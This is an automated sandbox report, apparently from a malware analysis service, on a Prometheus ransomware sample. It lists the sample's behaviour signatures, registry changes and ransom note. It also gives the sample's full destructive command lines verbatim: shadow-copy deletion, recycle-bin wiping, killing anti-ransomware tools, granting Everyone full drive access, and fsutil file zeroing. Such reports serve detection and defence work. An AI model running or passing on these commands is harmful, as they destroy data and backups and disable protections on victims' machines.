Analysis Overview
SHA256
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3
Threat Level: Known bad
The file e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin was found to be: Known bad.
Malicious Activity Summary
Disables service(s)
Prometheus Ransomware
Renames multiple (174) files with added filename extension
Renames multiple (200) files with added filename extension
Modifies Windows Firewall
Modifies file permissions
Drops startup file
Deletes itself
Checks computer location settings
Reads user/profile data of web browsers
Modifies WinLogon
Network Service Discovery
Launches sc.exe
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
System Network Configuration Discovery: Internet Connection Discovery
System policy modification
Kills process with taskkill
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Modifies Internet Explorer settings
Modifies registry key
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-13 05:39
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-13 05:39
Reported
2024-08-13 05:41
Platform
win7-20240705-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Disables service(s)
Prometheus Ransomware
Renames multiple (200) files with added filename extension
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" | C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" | C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\arp.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Kills process with taskkill
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\System32\mshta.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" | C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" | C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe
"C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe"
C:\Windows\system32\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
C:\Windows\system32\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
C:\Windows\system32\reg.exe
"reg" delete HKCU\Software\Raccine /F
C:\Windows\system32\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
C:\Windows\system32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
C:\Windows\system32\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
C:\Windows\system32\sc.exe
"sc.exe" config Dnscache start= auto
C:\Windows\system32\sc.exe
"sc.exe" config FDResPub start= auto
C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
C:\Windows\system32\sc.exe
"sc.exe" config SSDPSRV start= auto
C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
C:\Windows\system32\sc.exe
"sc.exe" config upnphost start= auto
C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\system32\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\system32\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM excel.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM steam.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM winword.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM visio.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
C:\Windows\system32\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
C:\Windows\system32\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
C:\Windows\system32\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\Users
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\A$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\B$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\C$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\D$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\E$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\F$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\G$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\J$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\H$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\K$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\I$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\L$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\M$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\P$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\N$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\Q$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\O$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\R$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\S$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\V$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\T$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\W$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\U$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\X$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\Y$
C:\Windows\system32\net.exe
"net.exe" use \\10.127.0.248\Z$
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
C:\Windows\system32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\system32\arp.exe
"arp" -a
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 142.250.179.196:443 | www.google.com | tcp |
Files
memory/3056-0-0x000007FEF5C03000-0x000007FEF5C04000-memory.dmp
memory/3056-1-0x0000000000D50000-0x0000000000D9E000-memory.dmp
memory/3056-2-0x000007FEF5C00000-0x000007FEF65EC000-memory.dmp
memory/1928-8-0x0000000001E10000-0x0000000001E18000-memory.dmp
memory/1928-7-0x000000001B6D0000-0x000000001B9B2000-memory.dmp
\??\PIPE\wkssvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/3056-448-0x000007FEF5C03000-0x000007FEF5C04000-memory.dmp
memory/3056-696-0x000007FEF5C00000-0x000007FEF65EC000-memory.dmp
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
| MD5 | aa2497f2df199d1d59dfe494f48d6029 |
| SHA1 | f07bbe471a7ba4acc1c68eab7c450097ff15238b |
| SHA256 | ac73bc483327d5e982792b0d6776b8cdd32cb7b6be61d19c4d8c7c4e0e9f52c7 |
| SHA512 | 3d9f15387e03374ce3607de9489d90917f0622f7228ca905b587f4440a31457fa4beba43d72313a4704c3cfa88b7731820b7e351c6841db572a80a1d8926a29e |
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
| MD5 | 9835ab4562d5cc431b31a78243b1f47d |
| SHA1 | 9055032bc4f4c4a738bb62315658cfeee03c5eb9 |
| SHA256 | 8b5efd63f358557df9bead4c4bcd4d339635672643ef906c800c0ed95bb26c87 |
| SHA512 | 08eeba9162f3ec2364f5a32b31f9b88570e6206ad33447e4052f6ae9961f21dd29eb17992e87c32b57201fca288f6918365d036fa75042aa99d00552892bcb52 |
memory/1164-797-0x000007FFFFF90000-0x000007FFFFFA0000-memory.dmp
memory/3056-799-0x000007FEF5C00000-0x000007FEF65EC000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-13 05:39
Reported
2024-08-13 05:41
Platform
win10v2004-20240802-en
Max time kernel
129s
Max time network
124s
Command Line
Signatures
Disables service(s)
Prometheus Ransomware
Renames multiple (174) files with added filename extension
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\icacls.exe | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" | C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" | C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\arp.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
Kills process with taskkill
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" | C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" | C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe
"C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe"
C:\Windows\SYSTEM32\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
C:\Windows\SYSTEM32\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
C:\Windows\SYSTEM32\reg.exe
"reg" delete HKCU\Software\Raccine /F
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config Dnscache start= auto
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SSDPSRV start= auto
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config FDResPub start= auto
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config upnphost start= auto
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM excel.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM steam.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
